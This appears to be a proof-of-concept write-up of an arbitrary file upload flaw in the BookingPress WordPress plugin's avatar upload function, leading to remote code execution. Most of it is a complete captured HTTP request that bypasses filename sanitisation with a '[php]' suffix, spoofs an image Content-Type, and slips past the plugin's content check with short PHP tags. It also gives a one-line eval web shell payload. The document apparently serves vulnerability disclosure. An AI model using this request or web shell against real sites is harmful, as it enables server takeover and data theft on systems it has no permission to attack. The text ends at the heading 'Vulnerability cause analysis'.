The BookingPress plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient filename validation in the 'bookingpress_upload_service_func', 'bookingpress_upload_customer_avatar_func' and 'bookingpress_upload_company_avatar_func' functions and lax filtering of 'bookingpress_read_file'. This allows an authenticated attacker with administrator-level capabilities or higher to upload arbitrary files on the affected site's server, enabling remote code execution.

Vulnerability recurrence

Here we take the bookingpress_upload_customer_avatar_func function as an example

Untitled

Add New

Untitled

Capture packets and modify content through burpsuite

Modify the content through burpsuite packet capture. The file suffix is [php] or (php) to bypass sanitize_file_name. Content-Type needs to be modified to image-related. Use <? ?> to bypass bookingpress_read_file.

Untitled

POST /wp-admin/admin-ajax.php?action=bookingpress_upload_customer_avatar&_wpnonce=0e7ca9aca0 HTTP/1.1
Host: localhost:9099
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: <http://localhost:9099/wp-admin/admin.php?page=bookingpress_customers>
Content-Type: multipart/form-data; boundary=---------------------------2986859182981567855468506664
Content-Length: 244
Origin: <http://localhost:9099>
Sec-GPC: 1
Connection: close
Cookie: wordpress_13b523f0f890b6aba72e693c42f8abc1=toor%7C1709096139%7ChGe5VBfmo6m3PVET53X88JlY6J2iGqODeDdcqR8Ceuh%7C3d9b538c215b71fb51a874ab2c7d0cb8e72bb126fe88815d126625b5cab62f5f; PHPSESSID=826f66883ffde0d1b9314097980ccc3f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_13b523f0f890b6aba72e693c42f8abc1=toor%7C1709096139%7ChGe5VBfmo6m3PVET53X88JlY6J2iGqODeDdcqR8Ceuh%7Cf4a737b540423fdd46c85883f8bcb6fea56ec782ac1752685b25cb53afd7503e; wp-settings-1=mfold%3Do%26libraryContent%3Dupload%26editor%3Dhtml; wp-settings-time-1=1708923340

-----------------------------2986859182981567855468506664
Content-Disposition: form-data; name="file"; filename="customer_avatar.[php]"
Content-Type: image/jpeg

<? phpinfo();?>
-----------------------------2986859182981567855468506664--

The content of the uploaded file can also be <?pHP phpinfo(); which can also be parsed

Untitled

Of course, can also upload <? eval($_POST[1]);?> malicious content to cause rce

Vulnerability cause analysis